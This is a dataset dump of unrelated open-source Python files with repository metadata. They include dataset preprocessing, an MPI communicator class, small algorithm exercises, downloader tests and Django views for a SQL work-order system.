os.listdir(_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR): if "{split}.zip.00".format(split=split) in splitzip: os.remove( os.path.join(_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR, splitzip)) # Extract "sample.zip", "trainLabels.csv.zip" for fname in ["sample", "trainLabels.csv"]: zfname = os.path.join(_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR, "{fname}.zip".format(fname=fname)) with zipfile.ZipFile(zfname) as zfile: zfile.extractall(_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR) os.remove(zfname) @staticmethod def _prepare(levels=None) -> None: """Generates the TFRecord objects for medium and realworld experiments.""" import multiprocessing from absl import logging from .tfds_adapter import DiabeticRetinopathyDiagnosis # Hangle each level individually for level in levels or ["medium", "realworld"]: dtask = DiabeticRetinopathyDiagnosis(data_dir=DATA_DIR, config=level) logging.debug("=== Preparing TFRecords for {} ===".format(level)) dtask.download_and_prepare() @classmethod def _preprocessors(cls) -> Tuple[transforms.Transform, transforms.Transform]: """Applies transformations to the raw data.""" import tensorflow_datasets as tfds # Transformation hyperparameters mean = np.asarray([0.42606387, 0.29752496, 0.21309826]) stddev = np.asarray([0.27662534, 0.20280295, 0.1687619]) class Parse(transforms.Transform): """Parses datapoints from raw `tf.data.Dataset`.""" def __call__(self, x, y=None): """Returns `as_supervised` tuple.""" return x["image"], x["label"] class CastX(transforms.Transform): """Casts image to `dtype`.""" def __init__(self, dtype): """Constructs a type caster.""" self.dtype = dtype def __call__(self, x, y): """Returns casted image (to `dtype`) and its (unchanged) label as tuple.""" return tf.cast(x, self.dtype), y class To01X(transforms.Transform): """Rescales image to [min, max]=[0, 1].""" def __call__(self, x, y): """Returns rescaled image and its (unchanged) label as tuple.""" return x / 255.0, y # Get augmentation schemes [augmentation_config, no_augmentation_config] = cls._ImageDataGenerator_config() # Transformations for train dataset transforms_train = transforms.Compose([ Parse(), CastX(tf.float32), To01X(), transforms.Normalize(mean, stddev), # TODO(filangel): hangle batch with ImageDataGenerator # transforms.RandomAugment(**augmentation_config), ]) # Transformations for validation/test dataset transforms_eval = transforms.Compose([ Parse(), CastX(tf.float32), To01X(), transforms.Normalize(mean, stddev), # TODO(filangel): hangle batch with ImageDataGenerator # transforms.RandomAugment(**no_augmentation_config), ]) return transforms_train, transforms_eval @staticmethod def _ImageDataGenerator_config(): """Returns the configs for the `tensorflow.keras.preprocessing.image.ImageDataGenerator`, used for the random augmentation of the dataset, following the implementation of https://github.com/chleibig/disease-detection/blob/f3401b26aa9b832ff77afe93 e3faa342f7d088e5/scripts/inspect_data_augmentation.py.""" augmentation_config = dict( featurewise_center=False, samplewise_center=False, featurewise_std_normalization=False, samplewise_std_normalization=False, zca_whitening=False, rotation_range=180.0, width_shift_range=0.05, height_shift_range=0.05, shear_range=0., zoom_range=0.10, channel_shift_range=0., fill_mode="constant", cval=0., horizontal_flip=True, vertical_flip=True, data_format="channels_last", ) no_augmentation_config = dict( featurewise_center=False, samplewise_center=False, featurewise_std_normalization=False, samplewise_std_normalization=False, zca_whitening=False, rotation_range=0.0, width_shift_range=0.0, height_shift_range=0.0, shear_range=0., zoom_range=0.0, channel_shift_range=0., fill_mode="nearest", cval=0., horizontal_flip=False, vertical_flip=False, data_format="channels_last", ) return augmentation_config, no_augmentation_config
setup.py
stjordanis/MONeT-1
161
8376
<filename>setup.py import setuptools setuptools.setup( name="monet_memory_optimized_training", version="0.0.1", description="Memory Optimized Network Training Framework", url="https://github.com/philkr/lowrank_conv", packages=setuptools.find_packages(include = ['monet', 'monet.*', 'models', 'checkmate', 'gist']), classifiers=[ "Programming Language :: Python :: 3", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", ], python_requires='>=3.6', )
hoomd/communicator.py
EdwardZX/hoomd-blue
204
8400
# Copyright (c) 2009-2021 The Regents of the University of Michigan # This file is part of the HOOMD-blue project, released under the BSD 3-Clause # License. """MPI communicator.""" from hoomd import _hoomd import hoomd import contextlib class Communicator(object): """MPI communicator. Args: mpi_comm: Accepts an mpi4py communicator. Use this argument to perform many independent hoomd simulations where you communicate between those simulations using mpi4py. ranks_per_partition (int): (MPI) Number of ranks to include in a partition. `Communicator` initialize MPI communications for a `hoomd.Simulation`. To use MPI, launch your Python script with an MPI launcher (e.g. ``mpirun`` or ``mpiexec``). By default, `Communicator` uses all ranks provided by the launcher ``num_launch_ranks`` for a single `hoomd.Simulation` object which decomposes the state onto that many domains. Set ``ranks_per_partition`` to an integer to partition launched ranks into ``num_launch_ranks / ranks_per_partition`` communicators, each with their own `partition` index. Use this to perform many simulations in parallel, for example by using `partition` as an index into an array of state points to execute. """ def __init__(self, mpi_comm=None, ranks_per_partition=None): # check ranks_per_partition if ranks_per_partition is not None: if not hoomd.version.mpi_enabled: raise RuntimeError( "The ranks_per_partition option is only available in MPI.\n" ) mpi_available = hoomd.version.mpi_enabled self.cpp_mpi_conf = None # create the specified configuration if mpi_comm is None: self.cpp_mpi_conf = _hoomd.MPIConfiguration() else: if not mpi_available: raise RuntimeError("mpi_comm is not supported in serial builds") handled = False # pass in pointer to MPI_Comm object provided by mpi4py try: import mpi4py if isinstance(mpi_comm, mpi4py.MPI.Comm): addr = mpi4py.MPI._addressof(mpi_comm) self.cpp_mpi_conf = \ _hoomd.MPIConfiguration._make_mpi_conf_mpi_comm(addr) handled = True except ImportError: # silently ignore when mpi4py is missing pass # undocumented case: handle plain integers as pointers to MPI_Comm # objects if not handled and isinstance(mpi_comm, int): self.cpp_mpi_conf = \ _hoomd.MPIConfiguration._make_mpi_conf_mpi_comm(mpi_comm) handled = True if not handled: raise RuntimeError( "Invalid mpi_comm object: {}".format(mpi_comm)) if ranks_per_partition is not None: # check validity if (self.cpp_mpi_conf.getNRanksGlobal() % ranks_per_partition): raise RuntimeError('Total number of ranks is not a multiple of ' 'ranks_per_partition.') # split the communicator into partitions self.cpp_mpi_conf.splitPartitions(ranks_per_partition) @property def num_ranks(self): """int: The number of ranks in this partition. When initialized with ``ranks_per_partition=None``, `num_ranks` is equal to the ``num_launch_ranks`` set by the MPI launcher. When using partitions, `num_ranks` is equal to ``ranks_per_partition``. Note: Returns 1 in builds with ENABLE_MPI=off. """ if hoomd.version.mpi_enabled: return self.cpp_mpi_conf.getNRanks() else: return 1 @property def rank(self): """int: The current rank within the partition. Note: Returns 0 in builds with ENABLE_MPI=off. """ if hoomd.version.mpi_enabled: return self.cpp_mpi_conf.getRank() else: return 0 @property def num_partitions(self): """int: The number of partitions in this execution. Create partitions with the ``ranks_per_partition`` argument on initialization. Then, the number of partitions is ``num_launch_ranks / ranks_per_partition``. Note: Returns 1 in builds with ENABLE_MPI=off. """ if hoomd.version.mpi_enabled: return self.cpp_mpi_conf.getNPartitions() else: return 1 @property def partition(self): """int: The current partition. Note: Returns 0 in builds with ENABLE_MPI=off. """ if hoomd.version.mpi_enabled: return self.cpp_mpi_conf.getPartition() else: return 0 def barrier_all(self): """Perform a MPI barrier synchronization across all ranks. Note: Does nothing in builds with ENABLE_MPI=off. """ if hoomd.version.mpi_enabled: _hoomd.mpi_barrier_world() def barrier(self): """Perform a barrier synchronization across all ranks in the partition. Note: Does nothing in builds with ENABLE_MPI=off. """ if hoomd.version.mpi_enabled: self.cpp_mpi_conf.barrier() @contextlib.contextmanager def localize_abort(self): """Localize MPI_Abort to this partition. HOOMD calls ``MPI_Abort`` to tear down all running MPI processes whenever there is an uncaught exception. By default, this will abort the entire MPI execution. When using partitions, an uncaught exception on one partition will therefore abort all of them. Use the return value of :py:meth:`localize_abort()` as a context manager to tell HOOMD that all operations within the context will use only that MPI communicator so that an uncaught exception in one partition will only abort that partition and leave the others running. """ global _current_communicator prev = _current_communicator _current_communicator = self yield None _current_communicator = prev # store the "current" communicator to be used for MPI_Abort calls. This defaults # to the world communicator, but users can opt in to a more specific # communicator using the Device.localize_abort context manager _current_communicator = Communicator()
pymclevel/test/__init__.py
bennettdc/MCEdit-Unified
673
8412
__author__ = 'Rio'
Python/other/merge_interval.py
TechSpiritSS/NeoAlgo
897
8424
''' Given an array of intervals, merge all overlapping intervals, and return an array of the non-overlapping intervals that cover all the intervals in the input. Input: intervals = [[1,3],[2,6],[8,10],[15,18]] Output: [[1,6],[8,10],[15,18]] Explanation: Since intervals [1,3] and [2,6] overlaps, merge them into [1,6]. ''' def merge(intervals): #sort the array intervals.sort() #take another empty list intervals_stack = [] for pair in intervals: if len(intervals_stack) == 0: intervals_stack.append(pair) #adding all the number in intervals elements in empty list #check number is equal or greater and less than pop elements else: current_pair = intervals_stack[-1] if current_pair[1]>=pair[0]: intervals_stack.pop() if current_pair[1]<pair[1]: new_pair = [current_pair[0],pair[1]] intervals_stack.append(new_pair) else: new_pair = [current_pair[0],current_pair[1]] intervals_stack.append(new_pair) else: intervals_stack.append(pair) # result return intervals_stack if __name__ == '__main__': R = int(input("Enter the number of rows:")) C = int(input("Enter the number of columns:")) interval = [[int(input("Enter the elements: ")) for x in range (C)] for y in range(R)] print("Overlapping interval: ",interval) print("Non-overlapping intervals: ",merge(interval)) """ Time complexity : O(n^2) Space complexity : O(n^2) INPUT:- Enter the number of rows:4 Enter the number of columns:2 Enter the elements: 1 Enter the elements: 3 Enter the elements: 2 Enter the elements: 6 Enter the elements: 8 Enter the elements: 10 Enter the elements: 15 Enter the elements: 18 OUTPUT:- Overlapping interval: [[1, 3], [2, 6], [8, 10], [15, 18]] Non-overlapping intervals: [[1, 6], [8, 10], [15, 18]] """
test/regression/features/arithmetic/mult.py
ppelleti/berp
137
8438
print(18 * 1234) print(18 * 1234 * 2) print(0 * 1) print(1 * 0) print(0.0 * 1.0) print(1.0 * 0.0)
src/nile/core/run.py
kootsZhin/nile
121
8469
"""Command to run Nile scripts.""" import logging from importlib.machinery import SourceFileLoader from nile.nre import NileRuntimeEnvironment def run(path, network): """Run nile scripts passing on the NRE object.""" logger = logging.getLogger() logger.disabled = True script = SourceFileLoader("script", path).load_module() nre = NileRuntimeEnvironment(network) script.run(nre)
Python/Basic Data Types/Lists/Solution.py
PawarAditi/HackerRank
219
8470
<reponame>PawarAditi/HackerRank array = [] for _ in range(int(input())): command = input().strip().split(" ") cmd_type = command[0] if (cmd_type == "print"): print(array) elif (cmd_type == "sort"): array.sort() elif (cmd_type == "reverse"): array.reverse() elif (cmd_type == "pop"): array.pop() elif (cmd_type == "remove"): array.remove(int(command[1])) elif (cmd_type == "append"): array.append(int(command[1])) elif (cmd_type == "insert"): array.insert(int(command[1]), int(command[2]))
scribdl/test/test_download.py
fatshotty/scribd-downloader
182
8482
<filename>scribdl/test/test_download.py from ..downloader import Downloader import os import pytest @pytest.fixture def cwd_to_tmpdir(tmpdir): os.chdir(str(tmpdir)) def test_audiobook_download(cwd_to_tmpdir, monkeypatch): audiobook_url = "https://www.scribd.com/audiobook/237606860/100-Ways-to-Motivate-Yourself-Change-Your-Life-Forever" audiobook_downloader = Downloader(audiobook_url) audio = audiobook_downloader.download() assert audio[0] == "100_Ways_to_Motivate_Yourself__Change_Your_Life_Forever_preview.mp3" assert os.path.getsize(audio[0]) == 2127830 def test_text_document_download(cwd_to_tmpdir): text_doc_url = "https://www.scribd.com/document/96882378/Trademark-License-Agreement" text_downloader = Downloader(text_doc_url) md_doc = text_downloader.download(is_image_document=False) assert os.path.getsize(md_doc.input_content) in range(1000, 2000) md_doc.to_pdf() assert os.path.getsize(md_doc.pdf_path) in range(20000, 31000) def test_img_document_download(cwd_to_tmpdir): img_doc_url = "https://www.scribd.com/doc/136711944/Signature-Scanning-and-Verification-in-Finacle" img_downloader = Downloader(img_doc_url) imgs = img_downloader.download(is_image_document=True) assert len(imgs.input_content) == 2 imgs.to_pdf() assert os.path.getsize(imgs.pdf_path) in range(140000, 150000) def test_book_download(cwd_to_tmpdir, monkeypatch): book_url = "https://www.scribd.com/read/262694921/Acting-The-First-Six-Lessons" book_downloader = Downloader(book_url) # We don't want to clutter stdout with book contents if this test fails monkeypatch.setattr("builtins.print", lambda x: None) md_book = book_downloader.download() assert os.path.getsize(md_book.input_content) in range(10000, 20000) md_book.to_pdf() assert os.path.getsize(md_book.pdf_path) in range(200000, 2500000)
yasql/apps/sqlorders/views.py
Fanduzi/YaSQL
443
8485
# -*- coding:utf-8 -*- # edit by fuzongfei import base64 import datetime # Create your views here. import json from django.http import Http404, HttpResponse from django.utils import timezone from django_filters.rest_framework import DjangoFilterBackend from rest_framework import filters from rest_framework.exceptions import PermissionDenied from rest_framework.generics import ListAPIView, GenericAPIView, CreateAPIView, UpdateAPIView, DestroyAPIView from rest_framework.views import APIView from rest_framework.viewsets import ViewSet from libs import permissions from libs.Pagination import Pagination from libs.RenderColumns import render_dynamic_columns from libs.response import JsonResponseV1 from sqlorders import models, serializers from sqlorders.filters import SqlOrderListFilter, GetTasksListFilter class GetDBEnvironment(ListAPIView): queryset = models.DbEnvironment.objects.all() serializer_class = serializers.DbEnvironmentSerializer # 获取工单环境 def get(self, request, *args, **kwargs): serializer = self.get_serializer(self.get_queryset(), many=True) return JsonResponseV1(data=serializer.data) class GetDbSchemas(APIView): # 获取指定环境指定用途的schemas列表 def get(self, request): serializer = serializers.DbSchemasSerializer(data=request.query_params) if serializer.is_valid(): return JsonResponseV1(data=serializer.query) return JsonResponseV1(message=serializer.errors, code='0001') class IncepSyntaxCheckView(APIView): def post(self, request, *args, **kwargs): serializer = serializers.IncepSyntaxCheckSerializer(data=request.data) if serializer.is_valid(): s, data = serializer.check() render_columns = [ {'key': 'order_id', 'value': '序号'}, {'key': 'stage', 'value': '阶段'}, {'key': 'stage_status', 'value': '阶段状态'}, {'key': 'error_level', 'value': '错误级别'}, {'key': 'error_message', 'value': '错误信息', 'width': '35%'}, {'key': 'sql', 'value': 'SQL内容', 'width': '25%', 'ellipsis': True}, {'key': 'affected_rows', 'value': '影响/扫描行数'} ] columns = render_dynamic_columns(render_columns) message = '语法检查未发现异常,可以提交' if not s: message = '语法检查发现异常,详情请查看输出,更正后在提交' d = { 'status': 0 if s else 1, 'data': data } data = {'columns': columns, 'data': d} return JsonResponseV1(data=data, message=message) return JsonResponseV1(message=serializer.errors, code='0001', flat=True) class SqlOrdersCommit(GenericAPIView): permission_classes = (permissions.CanCommitOrdersPermission,) serializer_class = serializers.SqlOrdersCommitSerializer def post(self, request, *args, **kwargs): serializer = self.get_serializer(data=request.data) if serializer.is_valid(): serializer.save() return JsonResponseV1(message="提交成功") return JsonResponseV1(message=serializer.errors, code='0001', flat=True) class SqlOrdersList(ListAPIView): permission_classes = (permissions.CanViewOrdersPermission,) queryset = models.DbOrders.objects.all() serializer_class = serializers.SqlOrdersListSerializer pagination_class = Pagination filter_backends = [DjangoFilterBackend, filters.SearchFilter, filters.OrderingFilter] filter_class = SqlOrderListFilter ordering = ['-created_at'] search_fields = ['title', 'database', 'remark', 'applicant', 'progress', 'contents'] def get(self, request, *args, **kwargs): queryset = self.filter_queryset(self.get_queryset()) page = self.paginate_queryset(queryset) serializer = self.get_serializer(page, many=True) render_columns = [ {'key': 'progress', 'value': '进度', 'width': '8%'}, {'key': 'applicant', 'value': '申请人'}, {'key': 'department', 'value': '部门'}, {'key': 'env_name', 'value': '环境'}, {'key': 'escape_title', 'value': '标题', 'width': '18%', 'ellipsis': True}, {'key': 'sql_type', 'value': '类型'}, {'key': 'remark', 'value': '备注'}, {'key': 'version', 'value': '版本'}, {'key': 'host', 'value': '实例/库'}, {'key': 'auditor', 'value': '审核人'}, {'key': 'reviewer', 'value': '复核人'}, ] columns = render_dynamic_columns(render_columns) data = {'columns': columns, 'data': serializer.data} return self.get_paginated_response(data) class SqlOrdersDetail(ListAPIView): """SQL工单详情""" permission_classes = (permissions.CanViewOrdersPermission,) queryset = models.DbOrders.objects.all() serializer_class = serializers.SqlOrderDetailSerializer lookup_field = 'order_id' def get(self, request, *args, **kwargs): queryset = self.get_object() serializer = self.get_serializer(queryset, context={"request": request}) return JsonResponseV1(data=serializer.data) class OpSqlOrderView(ViewSet): """更新SQL工单状态,如:审核,关闭等""" permission_classes = (permissions.CanViewOrdersPermission,) def get_obj(self, pk): try: obj = models.DbOrders.objects.get(pk=pk) return obj except models.DbOrders.DoesNotExist: raise Http404 def approve(self, request, pk): serializer = serializers.OpSqlOrderSerializer(instance=self.get_obj(pk), data=request.data, context={"request": request, "handler": "_approve"}) if serializer.is_valid(): serializer.save() return JsonResponseV1(data=serializer.data, message="操作成功") return JsonResponseV1(message=serializer.errors, code='0001') def feedback(self, request, pk): serializer = serializers.OpSqlOrderSerializer(instance=self.get_obj(pk), data=request.data, context={"request": request, "handler": "_feedback"}) if serializer.is_valid(): serializer.save() return JsonResponseV1(data=serializer.data, message="操作成功") return JsonResponseV1(message=serializer.errors, code='0001') def close(self, request, pk): serializer = serializers.OpSqlOrderSerializer(instance=self.get_obj(pk), data=request.data, context={"request": request, "handler": "_close"}) if serializer.is_valid(): serializer.save() return JsonResponseV1(data=serializer.data, message="操作成功") return JsonResponseV1(message=serializer.errors, code='0001') def review(self, request, pk): serializer = serializers.OpSqlOrderSerializer(instance=self.get_obj(pk), data=request.data, context={"request": request, "handler": "_review"}) if serializer.is_valid(): serializer.save() return JsonResponseV1(data=serializer.data, message="操作成功") return JsonResponseV1(message=serializer.errors, code='0001') class GenerateTasksView(APIView): permission_classes = (permissions.CanExecuteOrdersPermission,) def post(self, request, *args, **kwargs): serializer = serializers.GenerateSqlOrdersTasksSerializer(data=request.data) if serializer.is_valid(): data = serializer.save(request) return JsonResponseV1(data=data) return JsonResponseV1(message=serializer.errors, code='0001', flat=True) class GetTaskIdView(APIView): def get(self, request, *args, **kwargs): """根据order id返回taskid""" order_id = kwargs.get('order_id') task_id = models.DbOrdersExecuteTasks.objects.filter(order_id=order_id).first().task_id return JsonResponseV1(data=task_id) class GetTasksPreviewView(ListAPIView): permission_classes = (permissions.CanViewOrdersPermission,) queryset = models.DbOrdersExecuteTasks.objects.all() serializer_class = serializers.SqlOrdersTasksListSerializer pagination_class = Pagination filter_backends = [DjangoFilterBackend, filters.SearchFilter, filters.OrderingFilter] filter_class = GetTasksListFilter search_fields = ['sql'] ordering = ['created_time'] def get(self, request, *args, **kwargs): task_id = kwargs.get('task_id') queryset = self.filter_queryset(self.get_queryset().filter(task_id=task_id)) # 数据隐藏按钮打开了 # 仅允许申请人、审核人、复核人和超权用户查看数据 obj = models.DbOrders.objects.get( pk=models.DbOrdersExecuteTasks.objects.filter(task_id=task_id).first().order_id ) if obj.is_hide == 'ON' and not request.user.is_superuser: allowed_view_users = [obj.applicant] allowed_view_users.extend([x['user'] for x in json.loads(obj.auditor)]) allowed_view_users.extend([x['user'] for x in json.loads(obj.reviewer)]) if request.user.username not in allowed_view_users: raise PermissionDenied(detail='您没有权限查看该工单的数据,5s后,自动跳转到工单列表页面') origin_queryset = self.queryset.filter(task_id=task_id) total = origin_queryset.count() progress_0 = origin_queryset.filter(progress=0).count() progress_1 = origin_queryset.filter(progress=1).count() progress_3 = origin_queryset.filter(progress=3).count() page = self.paginate_queryset(queryset) serializer = self.get_serializer(page, context={'request': request}, many=True) render_columns = [ {'key': 'num', 'value': '序号'}, # 自定义num,前台显示序号使用 {'key': 'applicant', 'value': '申请人'}, {'key': 'sql', 'value': 'SQL', 'ellipsis': True, 'width': '50%'}, {'key': 'progress', 'value': '进度'}, {'key': 'result', 'value': '查看结果'}, # 自定义result ] columns = render_dynamic_columns(render_columns) data = {'columns': columns, 'data': {'data': serializer.data, 'total': total, 'progress_0': progress_0, 'progress_1': progress_1, 'progress_3': progress_3}} return self.get_paginated_response(data) class GetTasksListView(ListAPIView): permission_classes = (permissions.CanViewOrdersPermission,) queryset = models.DbOrdersExecuteTasks.objects.all() serializer_class = serializers.SqlOrdersTasksListSerializer pagination_class = Pagination filter_backends = [DjangoFilterBackend, filters.SearchFilter, filters.OrderingFilter] filter_class = GetTasksListFilter search_fields = ['sql'] ordering = ['created_time'] def get(self, request, *args, **kwargs): task_id = kwargs.get('task_id') queryset = self.filter_queryset(self.get_queryset().filter(task_id=task_id)) # 数据隐藏按钮打开了 # 仅允许申请人、审核人、复核人和超权用户查看数据 obj = models.DbOrders.objects.get( pk=models.DbOrdersExecuteTasks.objects.filter(task_id=task_id).first().order_id ) if obj.is_hide == 'ON' and not request.user.is_superuser: allowed_view_users = [obj.applicant] allowed_view_users.extend([x['user'] for x in json.loads(obj.auditor)]) allowed_view_users.extend([x['user'] for x in json.loads(obj.reviewer)]) if request.user.username not in allowed_view_users: raise PermissionDenied(detail='您没有权限查看该工单的数据,5s后,自动跳转到工单列表页面') page = self.paginate_queryset(queryset) serializer = self.get_serializer(page, context={'request': request}, many=True) render_columns = [ {'key': 'num', 'value': '序号'}, # 自定义num,前台显示序号使用 {'key': 'applicant', 'value': '申请人'}, {'key': 'sql', 'value': 'SQL', 'ellipsis': True, 'width': '50%'}, {'key': 'progress', 'value': '进度'}, {'key': 'execute', 'value': '执行'}, # 自定义execute {'key': 'result', 'value': '查看结果'}, # 自定义result ] if queryset.exists(): if queryset.first().sql_type == 'DDL': render_columns.insert(-1, {'key': 'ghost_pause', 'value': '暂停(gh-ost)'}) render_columns.insert(-1, {'key': 'ghost_recovery', 'value': '恢复(gh-ost)'}) columns = render_dynamic_columns(render_columns) data = {'columns': columns, 'data': serializer.data} return self.get_paginated_response(data) class ExecuteSingleTaskView(APIView): permission_classes = (permissions.CanExecuteOrdersPermission,) def post(self, request, *args, **kwargs): serializer = serializers.ExecuteSingleTaskSerializer(data=request.data) if serializer.is_valid(): serializer.execute(request) return JsonResponseV1(message="任务提交成功,请查看输出") return JsonResponseV1(message=serializer.errors, code='0001', flat=True) class ExecuteMultiTasksView(APIView): permission_classes = (permissions.CanExecuteOrdersPermission,) def post(self, request, *args, **kwargs): serializer = serializers.ExecuteMultiTasksSerializer(data=request.data) if serializer.is_valid(): serializer.execute(request) return JsonResponseV1(message="任务提交成功,请查看输出") return JsonResponseV1(message=serializer.errors, code='0001', flat=True) class ThrottleTaskView(APIView): permission_classes = (permissions.CanExecuteOrdersPermission,) def post(self, request, *args, **kwargs): serializer = serializers.ThrottleTaskSerializer(data=request.data) if serializer.is_valid(): message = serializer.execute(request) return JsonResponseV1(message=message) return JsonResponseV1(message=serializer.errors, code='0001', flat=True) class GetTasksResultView(ListAPIView): """SQL工单详情""" permission_classes = (permissions.CanViewOrdersPermission,) queryset = models.DbOrdersExecuteTasks.objects.all() serializer_class = serializers.GetTasksResultSerializer lookup_field = 'id' def get(self, request, *args, **kwargs): queryset = self.get_object() serializer = self.get_serializer(queryset, context={"request": request}) return JsonResponseV1(data=serializer.data) class HookSqlOrdersView(APIView): permission_classes = (permissions.anyof(permissions.CanCommitOrdersPermission, permissions.CanViewOrdersPermission, permissions.CanExecuteOrdersPermission, permissions.CanAuditOrdersPermission), ) def post(self, request, *args, **kwargs): serializer = serializers.HookSqlOrdersSerializer(data=request.data) if serializer.is_valid(): serializer.save() return JsonResponseV1(message="任务提交成功,请查看输出") return JsonResponseV1(message=serializer.errors, code='0001', flat=True) class DownloadExportFilesView(APIView): """下载导出文件""" permission_classes = (permissions.CanViewOrdersPermission,) def get(self, request, base64_filename): file_name = base64.b64decode(base64_filename).decode() if not models.DbExportFiles.objects.filter(file_name=file_name).exists(): raise Http404 obj = models.DbExportFiles.objects.get(file_name=file_name) if not models.DbOrdersExecuteTasks.objects.get(pk=obj.task_id).applicant == request.user.username: raise PermissionDenied(detail='您没有权限') fsock = open(f"media/{obj.files}", 'rb') response = HttpResponse(fsock, content_type="application/zip") response['Content-Disposition'] = f'attachment; filename={file_name}' return response class ReleaseVersionsGet(APIView): """获取上线版本号,提交工单使用""" def get(self, request): before_30_days = (timezone.now() - datetime.timedelta(days=30)) queryset = models.ReleaseVersions.objects.filter( expire_time__gte=before_30_days ).values('id', 'version', 'expire_time').order_by('-created_at') for row in queryset: row['disabled'] = 0 if row['expire_time'] < datetime.datetime.date(timezone.now()): row['disabled'] = 1 return JsonResponseV1(data=queryset) class ReleaseVersionsList(ListAPIView): """获取上线版本号列表,管理上线版本号使用""" permission_classes = (permissions.CanViewVersionPermission,) queryset = models.ReleaseVersions.objects.all() serializer_class = serializers.ReleaseVersionsListSerializer pagination_class = Pagination filter_backends = [filters.SearchFilter, filters.OrderingFilter] search_fields = ['username', 'version', 'expire_time'] ordering = ['-created_at'] def get(self, request, *args, **kwargs): queryset = self.filter_queryset(self.get_queryset()) page = self.paginate_queryset(queryset) serializer = self.get_serializer(page, many=True) render_columns = [ {'key': 'version', 'value': '版本'}, {'key': 'username', 'value': '创建人'}, {'key': 'expire_time', 'value': '截止日期'}, {'key': 'created_at', 'value': '创建时间'}, {'key': 'key', 'value': '操作'}, {'key': 'id', 'value': '详情'}, ] columns = render_dynamic_columns(render_columns) data = {'columns': columns, 'data': serializer.data} return self.get_paginated_response(data) class ReleaseVersionsCreate(CreateAPIView): """创建版本""" permission_classes = (permissions.CanCreateVersionsPermission,) serializer_class = serializers.ReleaseVersionsCreateSerializer def create(self, request, *args, **kwargs): serializer = self.get_serializer(data=request.data) if serializer.is_valid(): self.perform_create(serializer) return JsonResponseV1(message="创建成功") return JsonResponseV1(code='0001', message=serializer.errors, flat=True) class ReleaseVersionsUpdate(UpdateAPIView): """更新版本号,该类只更新单条记录""" permission_classes = (permissions.CanUpdateVersionsPermission,) def put(self, request, *args, **kwargs): serializer = serializers.ReleaseVersionsSerializer( instance=models.ReleaseVersions.objects.get(pk=kwargs['key']), # 返回单条记录 data=request.data ) if serializer.is_valid(): serializer.save() return JsonResponseV1(message="更新成功") return JsonResponseV1(code='0001', message=serializer.errors, flat=True) class ReleaseVersionsDelete(DestroyAPIView): """删除版本""" permission_classes = (permissions.CanDeleteVersionsPermission,) queryset = models.ReleaseVersions.objects.all() lookup_field = 'id' # 默认为主键,可不写 def destroy(self, request, *args, **kwargs): instance = self.get_object() self.perform_destroy(instance) return JsonResponseV1(message="删除成功") class ReleaseVersionsView(APIView): """获取指定版本内工单在所有环境的进度""" def get(self, request, *args, **kwargs): # 获取版本对应的主键 version = kwargs.get('version') version_id = models.ReleaseVersions.objects.get(version=version).pk # 获取环境,行转为动态列 obj = models.DbEnvironment.objects.values('id', 'name') row2columns = '' for row in obj: row2columns += f"max(if(env_id={row['id']}, progress, -1)) as {row['name']}," # 获取任务下所有工单分别在各个环境中的状态,此处的环境为动态环境 # id没有实际意义 query = f"select " + row2columns + \ f"substring(MD5(RAND()),1,20) as id,title as escape_title,order_id, applicant " \ f"from yasql_dborders where version_id='{version_id}' group by escape_title,order_id,applicant" rawquery = models.DbOrders.objects.raw(query) # 获取环境列名 dynamic_columns = list(rawquery.columns)[:-4] data = [] for row in rawquery: columns = { 'id': row.id, 'escape_title': row.escape_title, 'order_id': row.order_id, 'applicant': row.applicant, } for col in dynamic_columns: columns[col] = getattr(row, col) data.append(columns) render_columns = [ {'key': 'escape_title', 'ellipsis': True, 'value': '标题'}, {'key': 'applicant', 'value': '申请人'}, ] render_columns.extend([{'key': x, 'value': x} for x in dynamic_columns]) columns = render_dynamic_columns(render_columns) data = {'columns': columns, 'data': data} return JsonResponseV1(data=data)
dino/validation/events/message/limit_msg_length.py
thenetcircle/dino
150
8490
<reponame>thenetcircle/dino # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import logging import traceback from yapsy.IPlugin import IPlugin from activitystreams.models.activity import Activity from dino import utils from dino.config import ErrorCodes from dino.config import ConfigKeys from dino.environ import GNEnvironment logger = logging.getLogger(__name__) __author__ = '<NAME> <<EMAIL>>' class OnMessageCheckContentLength(IPlugin): def __init__(self): super(OnMessageCheckContentLength, self).__init__() self.env = None self.enabled = False self.max_length = 1000 def setup(self, env: GNEnvironment): self.env = env validation_config = self.env.config.get(ConfigKeys.VALIDATION) if 'on_message' not in validation_config or 'limit_msg_length' not in validation_config.get('on_message'): logger.info('no config enabled for plugin not_full, ignoring plugin') return on_create_config = validation_config.get('on_message').get('limit_msg_length') self.enabled = True self.max_length = on_create_config.get(ConfigKeys.MAX_MSG_LENGTH, 1000) def _process(self, data: dict, activity: Activity): message = activity.object.content if message is None or len(message.strip()) == 0: return True, None, None if not utils.is_base64(message): return False, ErrorCodes.NOT_BASE64, \ 'invalid message content, not base64 encoded' message = utils.b64d(message) if len(message) > self.max_length: return False, ErrorCodes.MSG_TOO_LONG, \ 'message content needs to be shorter than %s characters' % self.max_length return True, None, None def __call__(self, *args, **kwargs) -> (bool, str): if not self.enabled: return data, activity = args[0], args[1] try: return self._process(data, activity) except Exception as e: logger.error('could not execute plugin not_full: %s' % str(e)) logger.exception(traceback.format_exc()) return False, ErrorCodes.VALIDATION_ERROR, 'could not execute validation plugin not_full'
testing/scripts/checklicenses.py
zealoussnow/chromium
14,668
8497
